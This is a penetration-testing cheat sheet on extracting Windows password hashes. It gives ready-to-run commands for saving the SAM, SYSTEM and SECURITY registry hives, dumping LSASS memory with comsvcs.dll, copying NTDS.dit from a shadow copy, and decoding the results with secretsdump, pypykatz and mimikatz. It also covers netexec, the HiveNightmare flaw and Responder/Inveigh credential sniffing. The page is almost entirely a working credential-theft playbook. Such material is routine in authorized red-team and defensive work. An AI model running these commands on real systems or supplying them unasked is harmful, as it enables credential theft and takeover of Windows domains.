Extract Hash & Password

Attacks that allow obtaining NTLM hashes of local users or Active Directory domain users.

General Info

Database

SAM (Security Account Manager)

Hash format

LM (up to Vista Server 2008, 2 DES blocks of 7 lowercase chars, 69 chars total) NTLM (MD4)

Authentication protocols

NTLMv1 (uses LM and NTLM hashes) NTLMv2 (uses NTLM hashes) Kerberos

Process

LSASS (Local Security Authority Subsystem Service), system process dedicated to authentication, access, etc.

NTDS.dit

Each Domain Controller in Active Directory keeps this database file synchronized, which contains a lot of information including usernames and password hashes (SAM is used only for logins on the device with local accounts)

SAM Hashes

To extract hashes from the SAM database we need:

Administrator Privileges
hklm\sam contains the password hashes.
hklm\system contains the bootkey needed to decrypt the SAM db.
hklm\security contains cached credentials for domain accounts.

Get File

Create copies for transfer

reg.exe save hklm\sam C:\sam.save

reg.exe save hklm\system C:\system.save

reg.exe save hklm\security C:\security.save

Extract

Extracting hashes from the SAM database in offline mode by having the files. Use impacket-secretsdump.

secretsdump.py -sam sam.save -system system.save [-security security.save] LOCAL

LSASS Hashes

To extract hashes from the LSASS process we need:

Administrator Privileges
Dump of the running process

Get File

Create a copy for transfer

Task Manager > Right-click on LSAProcess > Create dump file

tasklist /svc or Get-Process lsass
# get PID LSASS

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dump full

Extract

Extracting hashes from the LSASS process dump in offline mode by having the files. Use pypykatz.

pypykatz lsa minidump lsass.dump

NTDS Hashes

To extract hashes from the NTDS.dit file we need::

Connect to a Domain Controller
Have Local Administrator (Administrators group) or Domain Administrator (Domain Admins group) rights (or equivalent)
hklm\system contains the bootkey needed for decryption

Get File

Create a copy for transfer

vssadmin CREATE SHADOW /For=C:

vshadow.exe -nw -p C:
# get PATH

cmd.exe /c copy <PATH>\Windows\NTDS\NTDS.dit c:\NTDS.dit

Extract

Extract hashes from NTDS.dit file offline, having the files. Use impacket-secretsdump.

secretsdump.py -ntds NTDS.dit -system system.save LOCAL

Store Password using Reversible Encryption

When this option is set on a user account, the passwords are stored using RC4 encryption with the key stored in the registry (the Syskey) that can be extracted by a Domain Admin or equivalent. Tools such as impacket-secretsdump.py will decrypt any passwords stored using reversible encryption while dumping the NTDS file either as a Domain Admin or using an attack such as DCSync.

Enumeration

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

With PowerView (Old and New)

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

With Tools

Tool

Details

netexec

Remotly nxc smb <IP> --local-auth -u <USER> -p <PASS> --sam --lsa nxc smb <IP_DC> -u <USER> -p <PASS> --ntds

mimikatz

On Host (need SeDebugPrivilege active, in addition to administrator privileges)

.\mimikatz.exe

> privilege::debug > lsadump::sam > lsadump::lsa > lsadump::secrets > sekurlsa::logonpasswords fullFor All Moduls see HERE.

impacket-secretsdump

secretsdump.py <DOMAIN>/<USER>:<PASS>@<DC>

HiveNightmare

Create a copy of the SAM files, System, Security from any user even unprivileged. CVE-2021-36934 - SeriousSam .\HiveNightmare.exe

Sniffing

Tool

Details

responder

Linux sudo responder -I <INTERFACE> sudo responder -I <INTERFACE> -A (passive analysis mode)

Inveigh

Windows PowerShell version (no longer maintained) Import-Module .\Inveigh.ps1 Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput YC# version .\Inveigh.exe [ESC] > HELP

Last updated 2 months ago